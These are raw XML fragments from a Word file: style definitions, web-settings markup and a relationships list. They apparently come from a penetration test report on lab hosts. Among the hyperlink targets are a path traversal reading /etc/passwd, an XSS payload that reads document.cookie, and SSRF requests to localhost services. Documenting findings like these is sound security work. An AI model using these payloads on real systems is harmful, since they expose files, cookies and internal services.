      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="relative">
    <w:name w:val="relative"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006F08D7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F08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F08D7"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable1Light-Accent1">
    <w:name w:val="Grid Table 1 Light Accent 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="46"/>
    <w:rsid w:val="006F08D7"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-IN"/>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6F08D7"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="62"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Book"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F08D7"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="360"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:contextualSpacing/>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sid w:val="00367D87"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00367D87"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00815CEC"/>
    <w:rPr>
      <w:color w:val="96607D" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00815CEC"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0E2841" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="CurrentList1">
    <w:name w:val="Current List1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003526C8"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="15"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Revision">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="000833BC"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid0">
    <w:name w:val="TableGrid"/>
    <w:rsid w:val="003C7B6F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="pl-PL" w:eastAsia="pl-PL"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00315FA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15FA2"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00315FA2"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="240"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00405CF7"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00405CF7"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00405CF7"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00405CF7"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00405CF7"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="font-claude-response-body">
    <w:name w:val="font-claude-response-body"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00445C7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072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07279"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00B251B3"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006923B6"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006923B6"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006923B6"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="960"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006923B6"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006923B6"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006923B6"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1680"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006923B6"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1920"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PlaceholderText">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00E225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004752">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="90518294">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="512959514">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1519198114">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1728986966">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="433407924">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="18296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4.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/ssrf" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/peass-ng/PEASS-ng/commit/e2cf10b0c2230d1a0e9bdcf8ffa4b3a18338c37e" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://eu-west-3.console.aws.amazon.com/ec2/home?region=eu-west-3" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.3.190:80/file_viewer.php?file=../../etc/passwd" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/269.html" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/732.html" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><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hyperlink" Target="https://cwe.mitre.org/data/definitions/649.html" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/269.html" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://eu-west-3.console.aws.amazon.com/ec2/home?region=eu-west-3" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///C:\etc\passwd" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.2.178/stocznia" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/639.html" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5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8.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.3.190:80/" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/916.html" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://eu-west-3.console.aws.amazon.com/ec2/home?region=eu-west-3" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.2.178:8080/stocznia/" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/552.html" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.3.190:80/nslookup.php" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.3.190/main.php?query=%3cscript%3ealert(document.cookie)%3c%2Fscript" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/vpc/latest/userguide/VPC_Internet_Gateway.html" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId125"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yperlink" Target="https://cwe.mitre.org/data/definitions/1336.html" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.3.190:80/url_fetch.php?url=localhost:8081/config.txt" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/522.html" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.2.178:8080/stocznia/images/photo.jpg" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://eu-west-3.console.aws.amazon.com/ec2/home?region=eu-west-3" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.2.178:8080/manager/html" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://portswigger.net/web-security/os-command-injection" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/639.html" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><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yperlink" Target="https://cwe.mitre.org/data/definitions/255.html" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.3.190:80/url_fetch.php?url=localhost:631" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/434.html" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId10" 